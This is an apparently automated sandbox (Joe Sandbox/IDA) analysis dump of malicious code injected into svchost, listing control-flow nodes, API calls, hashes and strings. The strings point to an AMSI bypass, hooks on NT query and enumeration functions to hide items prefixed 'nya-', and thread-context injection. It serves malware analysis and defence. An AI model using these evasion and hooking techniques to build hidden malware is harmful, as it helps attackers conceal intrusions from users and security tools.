8729 22f4b929324 __CxxCallCatchBlock 9 API calls 8730 22f4b92ae11 __CxxCallCatchBlock 8729->8730 8731 22f4b929978 __CxxCallCatchBlock 9 API calls 8730->8731 8735 22f4b92aec2 8731->8735 8732 22f4b92aeeb __CxxCallCatchBlock 8733 22f4b929324 __CxxCallCatchBlock 9 API calls 8732->8733 8734 22f4b92aefe 8733->8734 8736 22f4b929324 __CxxCallCatchBlock 9 API calls 8734->8736 8735->8732 8737 22f4b928ff8 __CxxCallCatchBlock 9 API calls 8735->8737 8738 22f4b92af07 8736->8738 8737->8732 8740 22f4b929324 __CxxCallCatchBlock 9 API calls 8739->8740 8741 22f4b92994d 8740->8741 8742 22f4b929958 8741->8742 8743 22f4b929324 __CxxCallCatchBlock 9 API calls 8741->8743 8744 22f4b929324 __CxxCallCatchBlock 9 API calls 8742->8744 8743->8742 8745 22f4b929969 8744->8745 8745->8729 8745->8730 8178 22f4b92824c 8180 22f4b928270 __scrt_release_startup_lock 8178->8180 8179 22f4b92b581 8180->8179 8181 22f4b92cb10 __std_exception_copy 13 API calls 8180->8181 8182 22f4b92b5aa 8181->8182 8546 22f4b925fcc 8547 22f4b925fd3 8546->8547 8548 22f4b926000 VirtualProtect 8547->8548 8550 22f4b925f10 8547->8550 8549 22f4b926029 GetLastError 8548->8549 8548->8550 8549->8550 8183 22f4b92ec30 GetCommandLineA GetCommandLineW 8184 22f4b926430 8185 22f4b92643d 8184->8185 8186 22f4b926449 8185->8186 8191 22f4b92655a 8185->8191 8187 22f4b9264cd 8186->8187 8188 22f4b9264a6 SetThreadContext 8186->8188 8188->8187 8189 22f4b926581 VirtualProtect FlushInstructionCache 8189->8191 8190 22f4b92663e 8192 22f4b92665e 8190->8192 8194 22f4b924b20 VirtualFree 8190->8194 8191->8189 8191->8190 8193 22f4b925530 3 API calls 8192->8193 8197 22f4b926663 8193->8197 8194->8192 8195 22f4b9266b7 8198 22f4b928070 _invalid_parameter_noinfo 8 API calls 8195->8198 8196 22f4b926677 ResumeThread 8196->8197 8197->8195 8197->8196 8199 22f4b9266ff 8198->8199 8746 22f4b92bd34 8747 22f4b92bd4d 8746->8747 8756 22f4b92bd49 8746->8756 8748 22f4b92e864 56 API calls 8747->8748 8749 22f4b92bd52 8748->8749 8761 22f4b92edc8 GetEnvironmentStringsW 8749->8761 8752 22f4b92bd5f 8754 22f4b92d2a0 __free_lconv_mon 13 API calls 8752->8754 8753 22f4b92bd6b 8781 22f4b92bda8 8753->8781 8754->8756 8758 22f4b92d2a0 __free_lconv_mon 13 API calls 8759 22f4b92bd92 8758->8759 8760 22f4b92d2a0 __free_lconv_mon 13 API calls 8759->8760 8760->8756 8762 22f4b92bd57 8761->8762 8763 22f4b92edf8 8761->8763 8762->8752 8762->8753 8764 22f4b92ece8 WideCharToMultiByte 8763->8764 8766 22f4b92ee49 8764->8766 8765 22f4b92ee53 FreeEnvironmentStringsW 8765->8762 8766->8765 8767 22f4b92c5d0 14 API calls 8766->8767 8768 22f4b92ee63 8767->8768 8769 22f4b92ee74 8768->8769 8770 22f4b92ee6b 8768->8770 8771 22f4b92ece8 WideCharToMultiByte 8769->8771 8772 22f4b92d2a0 __free_lconv_mon 13 API calls 8770->8772 8773 22f4b92ee97 8771->8773 8774 22f4b92ee72 8772->8774 8775 22f4b92eea5 8773->8775 8776 22f4b92ee9b 8773->8776 8774->8765 8778 22f4b92d2a0 __free_lconv_mon 13 API calls 8775->8778 8777 22f4b92d2a0 __free_lconv_mon 13 API calls 8776->8777 8779 22f4b92eea3 FreeEnvironmentStringsW 8777->8779 8778->8779 8779->8762 8782 22f4b92bdcd 8781->8782 8783 22f4b92d220 _invalid_parameter_noinfo 13 API calls 8782->8783 8795 22f4b92be03 8783->8795 8784 22f4b92be0b 8785 22f4b92d2a0 __free_lconv_mon 13 API calls 8784->8785 8787 22f4b92bd73 8785->8787 8786 22f4b92be6d 8788 22f4b92d2a0 __free_lconv_mon 13 API calls 8786->8788 8787->8758 8788->8787 8789 22f4b92d220 _invalid_parameter_noinfo 13 API calls 8789->8795 8790 22f4b92be92 8792 22f4b92bebc 13 API calls 8790->8792 8791 22f4b92c328 __std_exception_copy 38 API calls 8791->8795 8793 22f4b92be9a 8792->8793 8796 22f4b92d2a0 __free_lconv_mon 13 API calls 8793->8796 8794 22f4b92bea6 8797 22f4b92d06c _invalid_parameter_noinfo 17 API calls 8794->8797 8795->8784 8795->8786 8795->8789 8795->8790 8795->8791 8795->8794 8798 22f4b92d2a0 __free_lconv_mon 13 API calls 8795->8798 8796->8784 8799 22f4b92beb9 8797->8799 8798->8795 9310 22f4b922ab4 TlsGetValue TlsGetValue TlsGetValue 9311 22f4b922b0d 9310->9311 9316 22f4b922b79 9310->9316 9313 22f4b922b15 9311->9313 9311->9316 9312 22f4b922b74 9313->9312 9314 22f4b922c32 TlsSetValue TlsSetValue TlsSetValue 9313->9314 9315 22f4b923f88 StrCmpNIW 9313->9315 9314->9312 9315->9313 9316->9312 9316->9314 9317 22f4b923f88 StrCmpNIW 9316->9317 9317->9316 9318 22f4b9234b8 9319 22f4b9234e8 9318->9319 9320 22f4b9235a1 9319->9320 9321 22f4b923505 PdhGetCounterInfoW 9319->9321 9321->9320 9322 22f4b923523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9321->9322 9323 22f4b923555 StrCmpW 9322->9323 9324 22f4b92358d GetProcessHeap HeapFree 9322->9324 9323->9324 9326 22f4b92356a 9323->9326 9324->9320 9325 22f4b923950 12 API calls 9325->9326 9326->9324 9326->9325 7559 22f4b921e3c LoadLibraryA GetProcAddress 7560 22f4b921e62 SleepEx 7559->7560 7561 22f4b921e6f 7559->7561 7560->7560

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 56b6ef7aae2003b2666995d73d3f8da4165ef61dab3b018a8c9eb3aa42e26a65
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 9351A568D14A56B5FB88FFE5EE787D73730A708345F845932960902563DEFC82AAC390

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: b847adb62990c8b4585e741d70a7157698aa1bc9e67df0a6988a8ea5b1f4b2bb
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: BB41AF36A14B80DAE7A4DFA1E55839A77B1F388B88F008135DB8907759DF7CC595CB00

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 2707e0eff7b1b9e8f61abd333ff2ec4983dee57ae7fd51a1eb0f6ce0dd1bda2b
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: 50D06228E11A40F5F9CD7FD1DEBD35622716B5CB01FC45835C70E01262DEAD8569C341

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: b3e4a5b6f9333f152bb267859d7de1761df9f28d76ce986ecf85fb72ba9be1be
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: A4E03935A01604AAE794AFA2D82834A36E1EB8CB05F44D034CA0907351EFBDC899C740

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 0000022F4B923A35
                                            • PathFindFileNameW.SHLWAPI ref: 0000022F4B923A44
                                              • Part of subcall function 0000022F4B923F88: StrCmpNIW.KERNELBASE(?,?,?,0000022F4B92272F), ref: 0000022F4B923FA0
                                              • Part of subcall function 0000022F4B923EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923EDB
                                              • Part of subcall function 0000022F4B923EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F0E
                                              • Part of subcall function 0000022F4B923EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F2E
                                              • Part of subcall function 0000022F4B923EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F47
                                              • Part of subcall function 0000022F4B923EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F68
                                            • CreateThread.KERNELBASE ref: 0000022F4B923A8B
                                              • Part of subcall function 0000022F4B921E74: GetCurrentThread.KERNEL32 ref: 0000022F4B921E7F
                                              • Part of subcall function 0000022F4B921E74: CreateThread.KERNELBASE ref: 0000022F4B922043
                                              • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922049
                                              • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922055
                                              • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922061
                                              • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B92206D
                                              • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922079
                                              • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922085
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: 5f1f564115a3c2f07b4922df6e2128082fd153148bbbb057b57b51238e2adea1
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: 14118B29E28701BAFBE8BFE0EB2C39B23B0A758345F404835860681182DEFCC458C202

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 68 22f4b923f88-22f4b923f93 69 22f4b923f95-22f4b923fa8 StrCmpNIW 68->69 70 22f4b923fad-22f4b923fb4 68->70 69->70 71 22f4b923faa 69->71 71->70
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $nya-
                                            • API String ID: 0-1266920357
                                            • Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                            • Instruction ID: 7c511189d8bd023de34a560d2ec103ce2a25d726894c4c52d98c75f0c23c25be
                                            • Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                            • Instruction Fuzzy Hash: BBD05E29F21706ABFBA8AFE1EEE86A26370DB08B04F485032DA0001101DB988D9EC710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 1a342e552356d2e1af5ce3fa28535de16e2ccce78197f29e3b350a65e4913c9f
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: A191477AF0125097EBA0AF65D608F7EB3A1F744B96F548131AF490778AEA38D853C710

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0000022F4B921724: GetProcessHeap.KERNEL32 ref: 0000022F4B92172F
                                              • Part of subcall function 0000022F4B921724: HeapAlloc.KERNEL32 ref: 0000022F4B92173E
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217AE
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217DB
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9217F5
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921815
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921830
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921850
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92186B
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92188B
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9218A6
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9218C6
                                            • SleepEx.KERNELBASE ref: 0000022F4B921BDF
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9218E1
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921901
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92191C
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92193C
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921957
                                              • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921977
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921992
                                              • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92199C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: 3929e908c5efdb50802740529e7f9fb41309619d651063b853838cf7facbc3eb
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: E1319C5DE00665A1FB98BFE7D76936B23B4A744BC0F0458319F0987797DE98C4B0C214

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 215 22f4b922ff0-22f4b923069 217 22f4b92306f-22f4b923075 215->217 218 22f4b923384-22f4b9233a7 215->218 217->218 219 22f4b92307b-22f4b92307e 217->219 219->218 220 22f4b923084-22f4b923087 219->220 220->218 221 22f4b92308d-22f4b92309d GetModuleHandleA 220->221 222 22f4b9230b1 221->222 223 22f4b92309f-22f4b9230af GetProcAddress 221->223 224 22f4b9230b4-22f4b9230d2 222->224 223->224 224->218 226 22f4b9230d8-22f4b9230f7 StrCmpNIW 224->226 226->218 227 22f4b9230fd-22f4b923101 226->227 227->218 228 22f4b923107-22f4b923111 227->228 228->218 229 22f4b923117-22f4b92311e 228->229 229->218 230 22f4b923124-22f4b923137 229->230 231 22f4b923139-22f4b923145 230->231 232 22f4b923147 230->232 233 22f4b92314a-22f4b92314e 231->233 232->233 234 22f4b923150-22f4b92315c 233->234 235 22f4b92315e 233->235 236 22f4b923161-22f4b92316b 234->236 235->236 237 22f4b923251-22f4b923255 236->237 238 22f4b923171-22f4b923174 236->238 239 22f4b923376-22f4b92337e 237->239 240 22f4b92325b-22f4b92325e 237->240 241 22f4b923186-22f4b923190 238->241 242 22f4b923176-22f4b923183 call 22f4b921a30 238->242 239->218 239->230 243 22f4b92326f-22f4b923279 240->243 244 22f4b923260-22f4b92326c call 22f4b921a30 240->244 246 22f4b923192-22f4b92319f 241->246 247 22f4b9231c4-22f4b9231ce 241->247 242->241 249 22f4b9232a9-22f4b9232ac 243->249 250 22f4b92327b-22f4b923288 243->250 244->243 246->247 252 22f4b9231a1-22f4b9231ae 246->252 253 22f4b9231d0-22f4b9231dd 247->253 254 22f4b9231fe-22f4b923201 247->254 260 22f4b9232b9-22f4b9232c6 lstrlenW 249->260 261 22f4b9232ae-22f4b9232b7 call 22f4b921cc4 249->261 250->249 259 22f4b92328a-22f4b923297 250->259 262 22f4b9231b1-22f4b9231b7 252->262 253->254 255 22f4b9231df-22f4b9231ec 253->255 257 22f4b92320f-22f4b92321c lstrlenW 254->257 258 22f4b923203-22f4b92320d call 22f4b921cc4 254->258 263 22f4b9231ef-22f4b9231f5 255->263 266 22f4b92322f-22f4b923241 call 22f4b923f88 257->266 267 22f4b92321e-22f4b92322d call 22f4b921cfc 257->267 258->257 269 22f4b923247-22f4b92324c 258->269 265 22f4b92329a-22f4b9232a0 259->265 271 22f4b9232d9-22f4b9232e3 call 22f4b923f88 260->271 272 22f4b9232c8-22f4b9232d7 call 22f4b921cfc 260->272 261->260 277 22f4b9232ee-22f4b9232f9 261->277 262->269 270 22f4b9231bd-22f4b9231c2 262->270 263->269 273 22f4b9231f7-22f4b9231fc 263->273 276 22f4b9232a2-22f4b9232a7 265->276 265->277 266->269 281 22f4b9232e6-22f4b9232e8 266->281 267->266 267->269 269->281 270->247 270->262 271->281 272->271 272->277 273->254 273->263 276->249 276->265 285 22f4b923370-22f4b923374 277->285 286 22f4b9232fb-22f4b9232ff 277->286 281->239 281->277 285->239 289 22f4b923301-22f4b923305 286->289 290 22f4b923307-22f4b923321 call 22f4b933a40 286->290 289->290 291 22f4b923324-22f4b923327 289->291 290->291 294 22f4b923329-22f4b923347 call 22f4b933a40 291->294 295 22f4b92334a-22f4b92334d 291->295 294->295 295->285 296 22f4b92334f-22f4b92336d call 22f4b933a40 295->296 296->285
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 147cdcf82202d8e0471ff3581cefa6d14657757d9480307097532bc8ead48c1b
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: E0B1D429E14690AAFB9CAFA5D62835B63B4F744B84F405436DF0953796DFB8CD40C341
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: 5eede67ed12d608bc06b41e83df98e201cc61c4a372c92de6e6655074c48d11c
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 1D318176A04B8096EBA4AFA0E8A43DE7370F788744F44443ADB4D47B99EFB8C548C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: b9e4fb152665ba47da9891cea323b39acc5666c2d8f9b080be451602521d2c89
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 8F41BB3AA04B80A6EBA0DF64E89439F73B0F788754F500535EB8D46B9ADFB8C555CB00
                                            APIs
                                            Memory Dump Source
